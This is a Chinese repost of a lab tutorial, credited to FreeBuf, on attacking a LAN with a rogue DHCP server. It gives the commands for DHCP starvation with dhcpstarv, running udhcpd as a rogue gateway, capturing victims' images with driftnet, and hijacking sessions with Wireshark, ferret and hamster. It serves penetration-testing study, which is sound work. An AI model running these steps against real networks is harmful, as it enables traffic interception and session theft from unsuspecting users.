我是靠谱客的博主 多情砖头,最近开发中收集的这篇文章主要介绍流氓DHCP服务器内网攻击测试(转载)流氓DHCP服务器内网攻击测试,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

(转载)流氓DHCP服务器内网攻击测试

由于大神的 Blog 不在CSDN,所以下面附上原文地址。
http://www.freebuf.com/articles/network/74995.html
作者/s1riu5,转载来自FreeBuf黑客与极客(FreeBuf.COM
  • 概论

通常内网渗透都是基于ARP的攻击,但ARP攻击对内网的负担太重,很容易被发现。今天讲的是基于DHCP协议的攻击。

基于DHCP的攻击理解起来很简单,首先伪造Mac地址耗竭正常的DHCP服务器的IP地址,然后黑客用自己的主机伪造一个DHCP服务器,那么新连上内网的主机只能使用流氓DHCP服务器分配的IP,这样黑客的主机就变成了内网网关,可以借此控制内网中其他主机的网络流量。

攻击环境

  • 操作系统:Kali linux
  • 网关: 192.168.177.1
  • IP地址: 192.168.177.128
  • 网段:192.168.177.1/24

攻击流程

开启操作系统的路由转发

echo "1" >/proc/sys/net/ipv4/ip_forward

0X01


攻击正常的dhcp服务器,耗光ip资源

dhcpstarv -i eth0 -e 192.168.177.128

0X02

Kali默认没有安装dhcpstarv,也可以用yersinia代替


安装dhcp服务器udhcpd

# apt-get install udhcpd

然后修改一下配置文件

# vim /etc/udhcpd.conf

0X03-1

0X03-2


启动DHCP服务器

service udhcpd start

0X04-1

然后启动另一台Kali机当作目标靶机,由于正常的DHCP服务器已经没有可分配的IP资源,新的内网主机就会使用攻击者DHCP服务器分配的IP.

0X04-2


抓取目标靶机的图片

在攻击主机上开启driftnet

# driftnet -i eth0

在目标靶机打开百度图片

0X05-1

在攻击者的服务器上就可以看到图像

0X05-2


会话劫持

开启wireshark抓取流经本地网卡的数据包,由于其他的机器走的是攻击者主机的网卡,这也意味着wireshark可以抓取其他主机的数据包

0X06-1

用ferret解析一下

# ferret -r demo.pcap

0X06-2

会在本地生成一个名为hamster.txt的文件

0X06-3

然后运行harmter,这会在主机开启1234端口

0X06-4

配置一下火狐代理

0X06-5

劫持成功

0X06-6

最后

以上就是多情砖头为你收集整理的流氓DHCP服务器内网攻击测试(转载)流氓DHCP服务器内网攻击测试的全部内容,希望文章能够帮你解决流氓DHCP服务器内网攻击测试(转载)流氓DHCP服务器内网攻击测试所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(60)

评论列表共有 0 条评论

立即
投稿
返回
顶部